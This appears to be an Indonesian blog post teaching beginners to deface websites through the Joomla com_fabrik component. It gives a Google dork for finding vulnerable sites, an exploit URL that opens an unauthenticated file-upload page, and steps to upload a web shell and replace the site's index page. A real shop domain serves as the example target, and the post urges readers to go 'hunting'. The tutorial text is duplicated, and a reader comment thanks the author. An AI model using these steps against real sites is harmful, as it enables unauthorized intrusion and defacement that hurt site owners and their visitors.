Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti
sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti
ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu
bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
![[Image: 3_zps5c343d96.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sdpQfv8RSdzBFkJgl1L3ySx52cKlNdDUDyA1hA2P5YMfguBaRCx4QvZYD962Q-gecIGulkGaZVIzjyKZMQ8kLFWVm9kTKi1SLTexYVHwxkDL6KGdR-JHghKnuKXB_lC1SDH3yMRn8=s0-d)
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
![[Image: 4_zps8cde2690.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uVSRZgLFoU1S1CrcZdzeSzLZyTLhYnj7PLhIkFJ8nG0e8-dI-XwDVcLOXApoHRnFd0NquxJRCKl09x3AvvGOc-MiQ1mK93-3bnmy2NmUNfNzm16Iax-6p02Eq1kQOmMTNdswT0Qw=s0-d)
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
![[Image: 5_zpsfe8fbe56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tnHqIQkxhPBmnThOV4bfZxjSGCYbAZGLbS9lgZyku-5lPOIkvcvkFql9m7uKvU9Ic26bFwZyx4PLhhVy5vFffb5hgeqehJdjWJrJ_0dLKAj3mLrOAja0D8OgO5P2vzajmQIuC_sCM=s0-d)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
1 comments:
Tulis commentsthx ya atas informasi.a
Reply